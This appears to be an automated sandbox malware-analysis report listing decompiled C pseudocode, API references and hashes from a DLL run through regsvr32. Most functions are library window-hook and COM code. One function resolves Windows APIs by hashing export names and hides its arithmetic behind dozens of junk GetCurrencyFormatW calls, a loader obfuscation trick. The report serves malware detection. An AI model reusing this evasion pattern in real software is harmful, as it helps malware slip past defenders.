											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E1000C033);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E10020F40(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E100093B7(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1004846c = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E1002290B(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000EC55(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000A931(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1000B02E);
							__eflags = _t83 - E1000B02E;
							if(_t83 != E1000B02E) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000E519();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E10005CC1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E1001FCB0(_t94, _t105, _t110);
				}
			}



























                                                                                                            0x1000c177
                                                                                                            0x1000c177
                                                                                                            0x1000c177
                                                                                                            0x1000c181
                                                                                                            0x1000c186
                                                                                                            0x1000c189
                                                                                                            0x1000c18c
                                                                                                            0x1000c196
                                                                                                            0x1000c19c
                                                                                                            0x1000c1a3
                                                                                                            0x1000c1a5
                                                                                                            0x1000c1a8
                                                                                                            0x1000c1ae
                                                                                                            0x1000c1b0
                                                                                                            0x1000c1b2
                                                                                                            0x1000c1b2
                                                                                                            0x1000c1bb
                                                                                                            0x1000c1d0
                                                                                                            0x1000c1d2
                                                                                                            0x1000c1d5
                                                                                                            0x1000c1da
                                                                                                            0x1000c1dc
                                                                                                            0x1000c1e0
                                                                                                            0x1000c1e6
                                                                                                            0x1000c1fd
                                                                                                            0x1000c1fd
                                                                                                            0x1000c204
                                                                                                            0x1000c251
                                                                                                            0x1000c251
                                                                                                            0x1000c253
                                                                                                            0x1000c2bb
                                                                                                            0x1000c2c3
                                                                                                            0x1000c2ff
                                                                                                            0x1000c30b
                                                                                                            0x1000c312
                                                                                                            0x1000c344
                                                                                                            0x1000c347
                                                                                                            0x1000c34d
                                                                                                            0x1000c34f
                                                                                                            0x1000c352
                                                                                                            0x1000c35a
                                                                                                            0x1000c361
                                                                                                            0x1000c363
                                                                                                            0x1000c365
                                                                                                            0x1000c36c
                                                                                                            0x1000c374
                                                                                                            0x1000c376
                                                                                                            0x1000c379
                                                                                                            0x1000c37c
                                                                                                            0x1000c38a
                                                                                                            0x1000c38a
                                                                                                            0x1000c379
                                                                                                            0x1000c365
                                                                                                            0x1000c390
                                                                                                            0x1000c396
                                                                                                            0x1000c3a2
                                                                                                            0x1000c3a8
                                                                                                            0x1000c3af
                                                                                                            0x1000c3b1
                                                                                                            0x1000c3b6
                                                                                                            0x1000c3bc
                                                                                                            0x1000c3bc
                                                                                                            0x1000c3bc
                                                                                                            0x1000c3bc
                                                                                                            0x00000000
                                                                                                            0x1000c3c0
                                                                                                            0x00000000
                                                                                                            0x1000c314
                                                                                                            0x1000c2c7
                                                                                                            0x1000c2d2
                                                                                                            0x1000c2dd
                                                                                                            0x1000c2e3
                                                                                                            0x1000c2e9
                                                                                                            0x1000c2ea
                                                                                                            0x1000c2ec
                                                                                                            0x1000c2f4
                                                                                                            0x1000c2f7
                                                                                                            0x1000c2fd
                                                                                                            0x1000c323
                                                                                                            0x1000c329
                                                                                                            0x1000c32b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c335
                                                                                                            0x1000c339
                                                                                                            0x1000c33e
                                                                                                            0x1000c342
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c342
                                                                                                            0x00000000
                                                                                                            0x1000c2fd
                                                                                                            0x1000c25b
                                                                                                            0x1000c260
                                                                                                            0x1000c267
                                                                                                            0x1000c270
                                                                                                            0x1000c286
                                                                                                            0x1000c288
                                                                                                            0x1000c28e
                                                                                                            0x1000c290
                                                                                                            0x1000c292
                                                                                                            0x1000c292
                                                                                                            0x1000c29a
                                                                                                            0x1000c29e
                                                                                                            0x1000c2a2
                                                                                                            0x1000c2a6
                                                                                                            0x1000c2ac
                                                                                                            0x1000c2af
                                                                                                            0x1000c2b1
                                                                                                            0x1000c2b1
                                                                                                            0x00000000
                                                                                                            0x1000c2a6
                                                                                                            0x1000c209
                                                                                                            0x1000c20f
                                                                                                            0x1000c214
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c21a
                                                                                                            0x1000c21d
                                                                                                            0x1000c222
                                                                                                            0x1000c22f
                                                                                                            0x1000c233
                                                                                                            0x1000c239
                                                                                                            0x1000c239
                                                                                                            0x1000c242
                                                                                                            0x1000c247
                                                                                                            0x1000c24a
                                                                                                            0x1000c24b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c24b
                                                                                                            0x1000c1e8
                                                                                                            0x1000c1ef
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c1f5
                                                                                                            0x1000c1f7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c1bd
                                                                                                            0x1000c1c5
                                                                                                            0x1000c3c2
                                                                                                            0x1000c3c7
                                                                                                            0x1000c3c7

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 1000C181
                                                                                                              • Part of subcall function 10010A4A: __EH_prolog3.LIBCMT ref: 10010A51
                                                                                                            • CallNextHookEx.USER32 ref: 1000C1C5
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • GetClassLongA.USER32 ref: 1000C209
                                                                                                            • GlobalGetAtomNameA.KERNEL32 ref: 1000C233
                                                                                                            • SetWindowLongA.USER32 ref: 1000C288
                                                                                                            • _memset.LIBCMT ref: 1000C2D2
                                                                                                            • GetClassLongA.USER32 ref: 1000C302
                                                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 1000C323
                                                                                                            • GetWindowLongA.USER32 ref: 1000C347
                                                                                                            • GetPropA.USER32 ref: 1000C361
                                                                                                            • SetPropA.USER32 ref: 1000C36C
                                                                                                            • GetPropA.USER32 ref: 1000C374
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 1000C37C
                                                                                                            • SetWindowLongA.USER32 ref: 1000C38A
                                                                                                            • CallNextHookEx.USER32 ref: 1000C3A2
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 1000C3B6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                            • API String ID: 1191297049-4034971020
                                                                                                            • Opcode ID: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
                                                                                                            • Instruction ID: 7666ce8964d8ee3f6bc6ffcfd40649ad75606c78465d6ba84a3d7def91f03792
                                                                                                            • Opcode Fuzzy Hash: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
                                                                                                            • Instruction Fuzzy Hash: F461B17190036AAFEB15DB60CC49F9E7BB8EF083D1F114154F509A6196DB34AE81CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001688 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 204COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10001688(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				void* _t113;
				short* _t126;
				short* _t142;

				_t142 = L"xadqsavcbdfewescGADW";
				_t126 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 << 6) + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) * 0xf8;
				_v16 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) + _v16) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x3c)) + _a4;
				_v16 = _v16 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d8 * 8;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d4 * 0x28 +  *_v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc;
				_v12 =  *((intOrPtr*)(_v20 + 0x20)) + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 * 4 + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc << 2;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x1c)) + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x24)) + _v16 + _a4;
				_v16 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18)) == 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t113 = E100014CF( *((intOrPtr*)(_v12 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc + _v16) * 4)) + _a4);
					_push(0x22b9);
					_push(_t142);
					_push(0);
					_push(_t126);
					_push(0x11d4);
					_push(0);
					if(_t113 == _a8) {
						break;
					}
					_v16 = _v16 + 1;
					if(_v16 < GetCurrencyFormatW(??, ??, ??, ??, ??, ??) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18))) {
						continue;
					}
					goto L3;
				}
				_v8 =  *(_v8 + (GetCurrencyFormatW() *  *0x100440d4 + _v16) * 2) & 0x0000ffff;
				return  *((intOrPtr*)(_v4 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + _v8) * 4)) + _a4;
			}











                                                                                                            0x1000169a
                                                                                                            0x100016a2
                                                                                                            0x100016cc
                                                                                                            0x100016e4
                                                                                                            0x1000170c
                                                                                                            0x1000172d
                                                                                                            0x10001753
                                                                                                            0x1000176c
                                                                                                            0x10001797
                                                                                                            0x100017b3
                                                                                                            0x100017db
                                                                                                            0x100017f6
                                                                                                            0x10001818
                                                                                                            0x10001822
                                                                                                            0x10001836
                                                                                                            0x1000188f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001838
                                                                                                            0x10001838
                                                                                                            0x1000185d
                                                                                                            0x10001867
                                                                                                            0x1000186c
                                                                                                            0x1000186d
                                                                                                            0x1000186f
                                                                                                            0x10001870
                                                                                                            0x10001871
                                                                                                            0x10001873
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001875
                                                                                                            0x1000188d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000188d
                                                                                                            0x100018ba
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100016B0
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100016D0
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100016E8
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001710
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001731
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001757
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001770
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000179B
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100017B7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100017DF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100017FA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001826
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001844
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001879
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001899
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100018BE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
                                                                                                            • Instruction ID: 8a616b6614b71244b568cdf68a4d548a50dd06c55d0bd6723b2e1342b5ff1104
                                                                                                            • Opcode Fuzzy Hash: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
                                                                                                            • Instruction Fuzzy Hash: 55614BB1A44315BFE204DB91CD86F1BBBECEB8AB48F111809F7409A2D1C671EA158F65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001DB64 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E1001DB64(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E1001FBC4(0x10034a5c, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E1001FC9C(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10020F40(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x10038ec0;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E1001BDF4(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10020F40(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1003b19c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1001DB0D(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10004D75(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1001CE04(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10004D75(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1001E0F4))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E10010B51(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E100050DA(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E10004D4A(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1001D564(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E10005422(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E10005422(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E10005422(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E100209E8(_t300 + 0x14, 0x10040d04);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E10004D4A(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10020F40(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1001E0A8))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1001CA7C(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1001CE9E(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10004D75(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
